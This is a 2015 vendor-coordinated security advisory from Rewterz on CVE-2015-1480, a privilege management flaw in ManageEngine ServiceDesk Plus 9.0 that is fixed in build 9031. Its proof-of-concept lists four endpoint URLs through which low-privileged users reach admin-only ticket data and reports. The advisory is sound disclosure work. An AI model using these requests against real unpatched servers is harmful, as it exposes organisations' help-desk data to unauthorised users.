

ManageEngine ServiceDesk Plus User Enumeration Vulnerability
January 23, 2015
Rewterz Releases Jan-Apr 2015 Threat Intelligence Report on Attacks Targeting Pakistan’s Cyber Space
May 25, 2015
ManageEngine ServiceDesk Plus User Enumeration Vulnerability
January 23, 2015
Rewterz Releases Jan-Apr 2015 Threat Intelligence Report on Attacks Targeting Pakistan’s Cyber Space
May 25, 2015[REWTERZ-20140103] – Rewterz – Security Advisory
Title: ManageEngine ServiceDesk Plus User Privileges Management Vulnerability
Product: ServiceDesk Plus (http://www.manageengine.com/)
Affected Version: 9.0 (Other versions could also be affected)
Fixed Version: 9.0 Build 9031
Vulnerability Impact: Low
Advisory ID: REWTERZ-20140103
Published Date: 22-Jan-2015
Researcher: Muhammad Ahmed Siddiqui
Email: ahmed [at] rewterz.com
URL: http://rewterz.com/vulnerabilities/manageengine-servicedesk-plus-user-privileges-management-vulnerability
Product Introduction
ServiceDesk Plus is a help desk software with integrated asset and project management built on the ITIL framework. It is available in 29 different languages and is used by more than 85,000 companies, across 186 countries, to manage their IT help desk and assets.
Source: http://www.manageengine.com/products/service-desk/
Vulnerability Information
Class: Improper Privilege Management
Impact: Low privileged user can access application data
Remotely Exploitable: Yes
Authentication Required: Yes
User interaction required: Yes
CVE: CVE-2015-1480
Vulnerability Description
A user with limited privileges could gain access to certain functionality that is available only to administrative users. For example, users with Guest privileges can see the subjects of the tickets, stats and other information related to tickets.
Proof-of-Concept
http://127.0.0.1:8080/servlet/AJaxServlet?action=getTicketData&search=dateCrit
http://127.0.0.1:8080/swf/flashreport.swf
http://127.0.0.1:8080/reports/flash/details.jsp?group=Site
http://127.0.0.1:8080/reports/CreateReportTable.jsp?site=0
TimeLine
23-Dec-2014 – Notification to Vendor
24-Dec-2014 – Response from Vendor
30-Dec-2014 – Vulnerability fixed by Vendor